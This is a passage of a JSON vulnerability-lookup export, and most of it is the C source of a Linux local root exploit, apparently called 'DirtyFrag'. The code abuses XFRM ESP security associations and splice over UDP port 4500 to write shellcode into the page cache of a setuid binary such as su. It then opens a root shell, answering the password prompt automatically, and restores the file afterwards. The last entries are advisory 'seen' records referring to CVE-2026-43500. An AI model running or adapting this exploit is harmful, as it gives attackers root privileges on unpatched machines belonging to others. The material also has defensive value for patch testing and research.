\"0 %u 1\", ruid);\n\tfd = open(\"/proc/self/uid_map\", O_WRONLY);\n\tif (fd &lt; 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", rgid);\n\tfd = open(\"/proc/self/gid_map\", O_WRONLY);\n\tif (fd &lt; 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tint s = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (s &gt;= 0) {\n\t\tstruct ifreq ifr;\n\t\tmemset(&amp;ifr, 0, sizeof(ifr));\n\t\tstrncpy(ifr.ifr_name, \"lo\", IFNAMSIZ - 1);\n\t\tif (ioctl(s, SIOCGIFFLAGS, &amp;ifr) == 0) {\n\t\t\tifr.ifr_flags |= IFF_UP | IFF_RUNNING;\n\t\t\tioctl(s, SIOCSIFFLAGS, &amp;ifr);\n\t\t}\n\t\tclose(s);\n\t}\n\treturn 0;\n}\n\nstatic void nl_put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)\n{\n\tstruct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh-&gt;nlmsg_len));\n\trta-&gt;rta_type = type;\n\trta-&gt;rta_len  = RTA_LENGTH(len);\n\tmemcpy(RTA_DATA(rta), data, len);\n\tnlh-&gt;nlmsg_len = NLMSG_ALIGN(nlh-&gt;nlmsg_len) + RTA_ALIGN(rta-&gt;rta_len);\n}\n\nstatic int add_xfrm_sa(uint32_t spi, uint32_t patch_val)\n{\n\tint sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n\tif (sk &lt; 0) return -1;\n\n\tstruct sockaddr_nl nl = { .nl_family = AF_NETLINK };\n\tif (bind(sk, (struct sockaddr *)&amp;nl, sizeof(nl)) &lt; 0) { close(sk); return -1; }\n\n\tchar buf[4096];\n\tmemset(buf, 0, sizeof(buf));\n\tstruct nlmsghdr *nlh = (struct nlmsghdr *)buf;\n\tnlh-&gt;nlmsg_type  = XFRM_MSG_NEWSA;\n\tnlh-&gt;nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\n\tnlh-&gt;nlmsg_pid   = getpid();\n\tnlh-&gt;nlmsg_seq   = 1;\n\tnlh-&gt;nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));\n\n\tstruct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);\n\txs-&gt;id.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs-&gt;id.spi      = htonl(spi);\n\txs-&gt;id.proto    = IPPROTO_ESP;\n\txs-&gt;saddr.a4    = inet_addr(\"127.0.0.1\");\n\txs-&gt;family      = AF_INET;\n\txs-&gt;mode          = 
XFRM_MODE_TRANSPORT;\n\txs-&gt;replay_window = 0;\n\txs-&gt;reqid         = 0x1234;\n\txs-&gt;flags         = XFRM_STATE_ESN;\n\txs-&gt;lft.soft_byte_limit   = (uint64_t)-1;\n\txs-&gt;lft.hard_byte_limit   = (uint64_t)-1;\n\txs-&gt;lft.soft_packet_limit = (uint64_t)-1;\n\txs-&gt;lft.hard_packet_limit = (uint64_t)-1;\n\txs-&gt;sel.family  = AF_INET;\n\txs-&gt;sel.prefixlen_d = 32;\n\txs-&gt;sel.prefixlen_s = 32;\n\txs-&gt;sel.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs-&gt;sel.saddr.a4 = inet_addr(\"127.0.0.1\");\n\n\tchar auth_buf[sizeof(struct xfrm_algo_auth) + 32];\n\tmemset(auth_buf, 0, sizeof(auth_buf));\n\tstruct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)auth_buf;\n\tstrncpy(aa-&gt;alg_name, \"hmac(sha256)\", sizeof(aa-&gt;alg_name) - 1);\n\taa-&gt;alg_key_len   = 32 * 8;\n\taa-&gt;alg_trunc_len = 128;\n\tmemset(aa-&gt;alg_key, 0xAA, 32);\n\tnl_put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, auth_buf, sizeof(auth_buf));\n\n\tchar ciph_buf[sizeof(struct xfrm_algo) + 16];\n\tmemset(ciph_buf, 0, sizeof(ciph_buf));\n\tstruct xfrm_algo *ea = (struct xfrm_algo *)ciph_buf;\n\tstrncpy(ea-&gt;alg_name, \"cbc(aes)\", sizeof(ea-&gt;alg_name) - 1);\n\tea-&gt;alg_key_len = 16 * 8;\n\tmemset(ea-&gt;alg_key, 0xBB, 16);\n\tnl_put_attr(nlh, XFRMA_ALG_CRYPT, ciph_buf, sizeof(ciph_buf));\n\n\tstruct xfrm_encap_tmpl enc;\n\tmemset(&amp;enc, 0, sizeof(enc));\n\tenc.encap_type  = UDP_ENCAP_ESPINUDP;\n\tenc.encap_sport = htons(ENC_PORT);\n\tenc.encap_dport = htons(ENC_PORT);\n\tnl_put_attr(nlh, XFRMA_ENCAP, &amp;enc, sizeof(enc));\n\n\tstruct xfrm_replay_state_esn esn;\n\tmemset(&amp;esn, 0, sizeof(esn));\n\tesn.bmp_len       = 1;\n\tesn.oseq          = 0;\n\tesn.seq           = REPLAY_SEQ;\n\tesn.oseq_hi       = 0;\n\tesn.seq_hi        = patch_val;\n\tesn.replay_window = 32;\n\tnl_put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &amp;esn, sizeof(esn) + 4);\n\n\tif (send(sk, nlh, nlh-&gt;nlmsg_len, 0) &lt; 0) { close(sk); return -1; }\n\n\tchar rbuf[4096];\n\tint n = recv(sk, rbuf, sizeof(rbuf), 
0);\n\tclose(sk);\n\tif (n &lt; 0) return -1;\n\n\tstruct nlmsghdr *rh = (struct nlmsghdr *)rbuf;\n\tif (rh-&gt;nlmsg_type == NLMSG_ERROR) {\n\t\tstruct nlmsgerr *e = NLMSG_DATA(rh);\n\t\tif (e-&gt;error) return -1;\n\t}\n\treturn 0;\n}\n\nstatic int do_one_write(const char *path, off_t offset, uint32_t spi)\n{\n\tint sk_recv = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_recv &lt; 0) return -1;\n\n\tint one = 1;\n\tsetsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &amp;one, sizeof(one));\n\n\tstruct sockaddr_in sa;\n\tmemset(&amp;sa, 0, sizeof(sa));\n\tsa.sin_family = AF_INET;\n\tsa.sin_port   = htons(ENC_PORT);\n\tsa.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tif (bind(sk_recv, (struct sockaddr *)&amp;sa, sizeof(sa)) &lt; 0) { close(sk_recv); return -1; }\n\n\tint encap = UDP_ENCAP_ESPINUDP;\n\tif (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &amp;encap, sizeof(encap)) &lt; 0) { close(sk_recv); return -1; }\n\n\tint sk_send = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_send &lt; 0) { close(sk_recv); return -1; }\n\tif (connect(sk_send, (struct sockaddr *)&amp;sa, sizeof(sa)) &lt; 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint file_fd = open(path, O_RDONLY);\n\tif (file_fd &lt; 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint pfd[2];\n\tif (pipe(pfd) &lt; 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }\n\n\tunsigned char hdr[24];\n\t*(uint32_t *)(hdr + 0) = htonl(spi);\n\t*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);\n\tmemset(hdr + 8, 0xCC, 16);\n\n\tstruct iovec iov = { .iov_base = hdr, .iov_len = sizeof(hdr) };\n\tif (vmsplice(pfd[1], &amp;iov, 1, 0) != (ssize_t)sizeof(hdr))\n\t\tgoto fail;\n\n\toff_t off = offset;\n\tif (splice(file_fd, &amp;off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16)\n\t\tgoto fail;\n\n\tssize_t s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);\n\tusleep(150 * 1000);\n\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn (s == 40) ? 
0 : -1;\n\nfail:\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn -1;\n}\n\n/* corrupt stage error codes (child maps to exit 11..13) */\n#define CORRUPT_ERR_UNSHARE 1\n#define CORRUPT_ERR_XFRM    2\n#define CORRUPT_ERR_WRITE   3\n\nstatic int corrupt_su(void)\n{\n\tif (setup_userns_netns() &lt; 0)\n\t\treturn CORRUPT_ERR_UNSHARE;\n\tusleep(100 * 1000);\n\n\tfor (int i = 0; i &lt; TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\tuint32_t val =\n\t\t\t((uint32_t)shell_elf[i * 4 + 0] &lt;&lt; 24) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 1] &lt;&lt; 16) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 2] &lt;&lt;  8) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 3]);\n\t\tif (add_xfrm_sa(spi, val) &lt; 0)\n\t\t\treturn CORRUPT_ERR_XFRM;\n\t}\n\n\tfor (int i = 0; i &lt; TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\toff_t off = PATCH_OFFSET + (off_t)i * 4;\n\t\tif (do_one_write(g_target, off, spi) &lt; 0)\n\t\t\treturn CORRUPT_ERR_WRITE;\n\t}\n\treturn 0;\n}\n\nstatic const char *corrupt_err_msg(int code)\n{\n\tswitch (code) {\n\tcase CORRUPT_ERR_UNSHARE: return \"unshare / uid_map / lo setup failed in child\";\n\tcase CORRUPT_ERR_XFRM:    return \"XFRM SA registration failed (netlink denied?)\";\n\tcase CORRUPT_ERR_WRITE:   return \"splice/UDP 4500 write failed\";\n\tdefault:                  return \"unknown corrupt error\";\n\t}\n}\n\nstatic int target_already_patched(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd &lt; 0)\n\t\treturn 0;\n\tuint8_t got[8];\n\tssize_t n = pread(fd, got, sizeof(got), ENTRY_OFFSET);\n\tclose(fd);\n\tif (n != (ssize_t)sizeof(got))\n\t\treturn 0;\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0;\n}\n\nstatic int verify_patch(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd &lt; 0)\n\t\treturn -1;\n\tuint8_t got[8];\n\tif (pread(fd, got, sizeof(got), ENTRY_OFFSET) != (ssize_t)sizeof(got)) {\n\t\tclose(fd);\n\t\treturn 
-1;\n\t}\n\tclose(fd);\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0 ? 0 : -1;\n}\n\nstatic int run_esp_corrupt_stage(char *detail, size_t dlen)\n{\n\tpid_t cpid = fork();\n\tif (cpid &lt; 0) {\n\t\tsnprintf(detail, dlen, \"fork: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (cpid == 0) {\n\t\tint rc = corrupt_su();\n\t\t_exit(rc == 0 ? 0 : 10 + rc);\n\t}\n\tint wstatus;\n\tif (waitpid(cpid, &amp;wstatus, 0) &lt; 0) {\n\t\tsnprintf(detail, dlen, \"waitpid: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!WIFEXITED(wstatus)) {\n\t\tsnprintf(detail, dlen, \"child killed by signal %d\", WTERMSIG(wstatus));\n\t\treturn -1;\n\t}\n\tint est = WEXITSTATUS(wstatus);\n\tif (est != 0) {\n\t\tsnprintf(detail, dlen, \"%s\", corrupt_err_msg(est - 10));\n\t\treturn -1;\n\t}\n\tif (verify_patch(g_target) &lt; 0) {\n\t\tsnprintf(detail, dlen,\n\t\t\t \"page cache unchanged at 0x%x (patched kernel / LSM / container?)\",\n\t\t\t ENTRY_OFFSET);\n\t\treturn -1;\n\t}\n\tdetail[0] = '\\0';\n\treturn 0;\n}\n\nstatic int target_is_su_binary(const char *path)\n{\n\tconst char *base = strrchr(path, '/');\n\tbase = base ? 
base + 1 : path;\n\treturn strcmp(base, \"su\") == 0;\n}\n\nstatic void exec_patched_target(void)\n{\n\tchar *envp[] = { \"TERM=xterm\", NULL };\n\texecle(g_target, g_target, NULL, envp);\n\t_exit(127);\n}\n\nstatic void exec_su_login(void)\n{\n\tstatic const char *paths[] = {\n\t\t\"/bin/su\", \"/usr/bin/su\", \"/sbin/su\", \"/usr/sbin/su\", NULL,\n\t};\n\tfor (int i = 0; paths[i]; i++)\n\t\texecl(paths[i], \"su\", \"-\", (char *)NULL);\n\texeclp(\"su\", \"su\", \"-\", (char *)NULL);\n\t_exit(127);\n}\n\nstatic int run_root_pty(void)\n{\n\tint master = posix_openpt(O_RDWR | O_NOCTTY);\n\tif (master &lt; 0)\n\t\treturn -1;\n\tif (grantpt(master) &lt; 0 || unlockpt(master) &lt; 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tchar *slave_name = ptsname(master);\n\tif (!slave_name) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\n\tstruct winsize ws;\n\tif (ioctl(STDIN_FILENO, TIOCGWINSZ, &amp;ws) == 0)\n\t\tioctl(master, TIOCSWINSZ, &amp;ws);\n\n\tpid_t pid = fork();\n\tif (pid &lt; 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tsetsid();\n\t\tint slave = open(slave_name, O_RDWR);\n\t\tif (slave &lt; 0)\n\t\t\t_exit(127);\n\t\tioctl(slave, TIOCSCTTY, 0);\n\t\tdup2(slave, 0);\n\t\tdup2(slave, 1);\n\t\tdup2(slave, 2);\n\t\tif (slave &gt; 2)\n\t\t\tclose(slave);\n\t\tclose(master);\n\t\tif (target_is_su_binary(g_target))\n\t\t\texec_su_login();\n\t\texec_patched_target();\n\t}\n\n\tsignal(SIGTTOU, SIG_IGN);\n\tsignal(SIGTTIN, SIG_IGN);\n\tsignal(SIGPIPE, SIG_IGN);\n\tsignal(SIGHUP, SIG_IGN);\n\n\tstruct termios saved_termios;\n\tint restore_termios = 0;\n\tif (tcgetattr(STDIN_FILENO, &amp;saved_termios) == 0) {\n\t\tstruct termios raw = saved_termios;\n\t\tcfmakeraw(&amp;raw);\n\t\tif (tcsetattr(STDIN_FILENO, TCSANOW, &amp;raw) == 0)\n\t\t\trestore_termios = 1;\n\t}\n\n\tint auto_pw_sent = 0;\n\tint stdin_eof = 0;\n\tint saw_master_output = 0;\n\tint total_ms = 0;\n\tchar buf[4096];\n\n\tfor (;;) {\n\t\tstruct pollfd pfds[2] = {\n\t\t\t{ stdin_eof ? 
-1 : STDIN_FILENO, POLLIN, 0 },\n\t\t\t{ master, POLLIN, 0 },\n\t\t};\n\t\tint pr = poll(pfds, 2, 200);\n\t\tif (pr &lt; 0 &amp;&amp; errno != EINTR)\n\t\t\tbreak;\n\t\ttotal_ms += 200;\n\n\t\tif (pfds[1].revents &amp; POLLIN) {\n\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\tif (n &lt;= 0)\n\t\t\t\tbreak;\n\t\t\tsaw_master_output = 1;\n\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\tif (!auto_pw_sent &amp;&amp; n &lt; (ssize_t)sizeof(buf)) {\n\t\t\t\tbuf[n] = '\\0';\n\t\t\t\tif (strstr(buf, \"Password\") || strstr(buf, \"password\")) {\n\t\t\t\t\twrite(master, \"\\n\", 1);\n\t\t\t\t\tauto_pw_sent = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (!stdin_eof &amp;&amp; (pfds[0].revents &amp; POLLIN)) {\n\t\t\tssize_t n = read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n &lt;= 0)\n\t\t\t\tstdin_eof = 1;\n\t\t\telse\n\t\t\t\twrite(master, buf, n);\n\t\t}\n\t\tif (pfds[1].revents &amp; (POLLHUP | POLLERR))\n\t\t\tbreak;\n\n\t\tif (!auto_pw_sent &amp;&amp; !saw_master_output &amp;&amp; total_ms &gt;= 1500) {\n\t\t\twrite(master, \"\\n\", 1);\n\t\t\tauto_pw_sent = 1;\n\t\t}\n\n\t\tint status;\n\t\tpid_t w = waitpid(pid, &amp;status, WNOHANG);\n\t\tif (w == pid) {\n\t\t\tfor (int i = 0; i &lt; 5; i++) {\n\t\t\t\tstruct pollfd pf = { master, POLLIN, 0 };\n\t\t\t\tif (poll(&amp;pf, 1, 50) &lt;= 0)\n\t\t\t\t\tbreak;\n\t\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\t\tif (n &lt;= 0)\n\t\t\t\t\tbreak;\n\t\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (restore_termios)\n\t\ttcsetattr(STDIN_FILENO, TCSANOW, &amp;saved_termios);\n\tclose(master);\n\treturn 0;\n}\n\nstatic int restore_original(void)\n{\n\tif (!g_have_backup) return -1;\n\n\t// just drop the file's page cache -&gt; kernel reloads from disk\n\tint fd = open(g_target, O_RDONLY);\n\tif (fd &lt; 0) return -1;\n\tposix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);\n\tclose(fd);\n\n\t// verify first 8 bytes match backup (disk copy)\n\tunsigned char cur[8];\n\tfd = open(g_target, 
O_RDONLY);\n\tif (fd &lt; 0) return -1;\n\tint n = pread(fd, cur, 8, 0);\n\tclose(fd);\n\tif (n != 8) return -1;\n\tif (memcmp(cur, g_backup, 8) != 0) return -1;\n\n\treturn 0;\n}\n\nstatic void parse_args(int argc, char **argv)\n{\n\tfor (int i = 1; i &lt; argc; i++) {\n\t\tif (!strcmp(argv[i], \"-v\") || !strcmp(argv[i], \"--verbose\"))\n\t\t\tg_verbose = 1;\n\t\telse if (argv[i][0] != '-')\n\t\t\tg_target = argv[i];\n\t}\n\tif (getenv(\"DIRTYFRAG_VERBOSE\"))\n\t\tg_verbose = 1;\n}\n\nint main(int argc, char **argv)\n{\n\tg_tty = isatty(STDOUT_FILENO);\n\tsetlinebuf(stdout);\n\tparse_args(argc, argv);\n\n\tif (getuid() == 0) {\n\t\texeclp(\"/bin/bash\", \"bash\", (char *)NULL);\n\t\t_exit(1);\n\t}\n\n\tprint_banner();\n\n\tif (check_kernel_config() &lt; 0)\n\t\treturn 1;\n\n\tif (check_userns_runtime() &lt; 0)\n\t\treturn 1;\n\n\tif (scan_setuid_binaries() &lt; 0)\n\t\treturn 1;\n\n\tphase_header(4, \"ESP corrupt (XFRM/UDP 4500)\");\n\tprintf(\"  %s\u2192%s target: %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_MAG), g_target, C(C_RST));\n\n\t{\n\t\tchar why[256];\n\t\tif (probe_target(g_target, why, sizeof(why)) &lt; 0) {\n\t\t\tstatus_line(\"target\", 0, why);\n\t\t\tfprintf(stderr,\n\t\t\t\t\"\\n%s  [!] Exploit needs read+execute on the setuid binary (open for splice).%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] Shared hosting often blocks reading /usr/bin/su even though 'find' lists it.%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] 
Use a full VM/VPS/lab where you can: cat %s | head -c 4%s\\n\\n\",\n\t\t\t\tC(C_YEL), g_target, C(C_RST));\n\t\t\treturn 1;\n\t\t}\n\t}\n\tstatus_line(\"target\", 1, \"setuid + readable + openable\");\n\n\tif (target_already_patched(g_target)) {\n\t\tstatus_line(\"patch\", 1, \"already patched \u2014 skip corrupt stage\");\n\t} else {\n\t\tif (save_original(g_target) &lt; 0) {\n\t\t\tstatus_line(\"backup\", 0, \"failed to save 192 original bytes\");\n\t\t\treturn 1;\n\t\t}\n\t\tstatus_line(\"backup\", 1, \"192 bytes saved\");\n\n\t\tprintf(\"\\n%s  [*] unshare userns+netns, register %d XFRM SA, splice\u2192UDP 4500...%s\\n\",\n\t\t       C(C_YEL), TOTAL_SAS, C(C_RST));\n\n\t\t{\n\t\t\tchar err[256];\n\t\t\tif (run_esp_corrupt_stage(err, sizeof(err)) &lt; 0) {\n\t\t\t\tstatus_line(\"corrupt\", 0, err[0] ? err : \"ESP path failed\");\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"\\n%s  [!] Common on shared/VPS hosts: XFRM netlink blocked, splice restricted, or kernel patched.%s\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"%s  [!] Try: uname -r  and test on WSL2/lab. 
Without userns: CVE-2026-43500 (rxrpc).%s\\n\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\treturn 1;\n\t\t\t}\n\t\t}\n\t\tstatus_line(\"corrupt\", 1, \"all iterations done\");\n\t\tstatus_line(\"verify\", 1, \"shellcode marker at 0x78 OK\");\n\t}\n\n\tphase_header(5, \"root shell\");\n\tprintf(\"\\n%s\", C(C_GRN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  root shell \u2014 exit to restore        \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n\n\tprintf(\"  %s\u2192%s spawn: %s%s\\n\\n\", C(C_DIM), C(C_RST), g_target, C(C_RST));\n\tif (run_root_pty() &lt; 0) {\n\t\tstatus_line(\"pty\", 0, \"PTY failed, trying direct exec\");\n\t\texec_patched_target();\n\t\tfprintf(stderr, \"%s  [!] exec %s: %s%s\\n\", C(C_RED), g_target, strerror(errno), C(C_RST));\n\t\treturn 1;\n\t}\n\n\tprintf(\"\\n%s  [*] shell closed \u2014 restoring page cache...%s\\n\", C(C_YEL), C(C_RST));\n\tif (restore_original() &lt; 0) {\n\t\tfprintf(stderr, \"%s  [!] 
restore failed \u2014 try: echo 3 | sudo tee /proc/sys/vm/drop_caches%s\\n\",\n\t\t        C(C_RED), C(C_RST));\n\t\treturn 1;\n\t}\n\tprintf(\"%s  [+] target restored from disk.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n", "creation_timestamp": "2026-05-26T12:10:20.000000Z"}, {"uuid": "b5df876a-479b-42f9-a547-ba12cb3ca717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/control-systems-moxa-security-advisory-av26-509", "content": "", "creation_timestamp": "2026-05-26T05:59:13.000000Z"}, {"uuid": "fe74bf48-45e1-4985-845f-9f7b589e7241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/mitel-security-advisory-av26-524", "content": "", "creation_timestamp": "2026-05-28T12:10:15.000000Z"}]}